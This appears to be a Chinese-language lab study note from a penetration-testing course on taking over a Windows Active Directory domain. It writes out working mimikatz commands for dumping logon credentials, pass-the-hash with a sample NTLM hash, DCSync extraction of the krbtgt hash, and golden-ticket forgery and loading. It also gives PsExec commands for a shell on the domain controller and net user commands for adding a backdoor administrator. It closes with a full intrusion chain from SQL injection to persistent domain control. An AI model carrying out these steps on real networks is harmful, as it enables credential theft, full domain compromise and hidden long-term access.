域 (网吧网管就是域控)
控制端 -> 客户端 (控制端 可以控制 客户端)域(分上下级)
默认是工作组(人人平等,谁也控制不了谁) systeminfo work
(制作域:管理工具-服务器管理器-角色-添加角色-域服务-下一步-安装-域服务安装向导-下一步
加入域:计算机右键-属性-计算机名称-更改设置-域,把DNS改成域控的DNS,域控的账号密码)
核心功能:域控账号可以登录域内任意主机(依靠票据Kerberos认证协议)
如果Domain显示名称,大概率是域控,如果是数字代码(例如A1),基本上是域里的机子
如果抓到密码是密文,需要用哈希传递的方法(我们现在有密文密码,直接构建密文密码去登录)
mimikatz
sekurlsa::logonpasswords 抓取密码
sekurlsa::pth /user:administrator /domain:”zkaq.cn” /ntlm:61465a991b168727b65b3644aab823cd
user:登陆用户 domain:域地址 ntlm:密文加密值
然后会弹出cmd框 dir \WIN-D6PMU0BTMC1.zkaq.cn\c$ 【查看域控C盘】(域控名.域控)(\为UNC路径,共享文件)
cd 路径
PsExec.exe \域控地址WIN-D6PMU0BTMC1.zkaq.cn cmd (获取域控权限)
拿到域控后可以直接执行命令,添加账号
net user abc A1B2C3!Qa /add
net localgroup administrators abc /add
添加完账号后可以直接连接域控了(实战不建议添加账号,太明显,所以需要票据)
票据:通行证,只要有对的票据,域里面的机器可以无密码登录
依靠KDC密钥分发中心
域控的账号密码去登录页域主机
域主机检测域控登录的账号密码对不对,域主机->KDC(存放了域控主机的账号密码(KDC密码)来验证)KDC一般在域控上
黄金票据(域控的密码):利用KDC账号做成一个票据,然后可以直接登录,不会因为域控的登录账号密码的变化而变化,
(相当于搞了张假的通行证,方便长期控制,正常情况下,KDC也会偶尔登录域主机,所以很难分辨出来,使用黄金票据,域内主机会认为你就是KDC直接放行)
制作黄金票据:
1.抓取KDC账号密码
cd 路径
privilege::debug
lsadump::dcsync /user:krbtgt 获取krbtgt的密码 [mimikatz 会模拟域控,向目标域控请求账号密码信息]
提取出里面的sid和hashNTLM (Sid 里面的-502去除)
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi (生成票据名) [制作票据]
把票据拖到目标主机
kerberos::ptt administrator.kiribi [加载票据]
做票据(任何机器上都可以做,核心是需要有制作票据的东西)
dir \WIN-D6PMU0BTMC1.zkaq.cn\c$
PsExec.exe \域控地址WIN-D6PMU0BTMC1.zkaq.cn cmd
通过SQL注入-getshell-提权(加入管理员)-内网穿透(正向连接 reg)-3389上了第一台机器(不在域内)-抓取账户名和密码(等到明文密码)-撞库(登录第二台机器)(在域里,域控账户密码可以登录任意域主机,登陆过所以可以在这个机器抓到账户米密码,但是抓到域控密文)-哈希传递(拿到域控权限)-(长期控制)做了黄金票据(KDC认证)(可以登录任何域里的主机,域的账户密码被修改了也没关系)
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.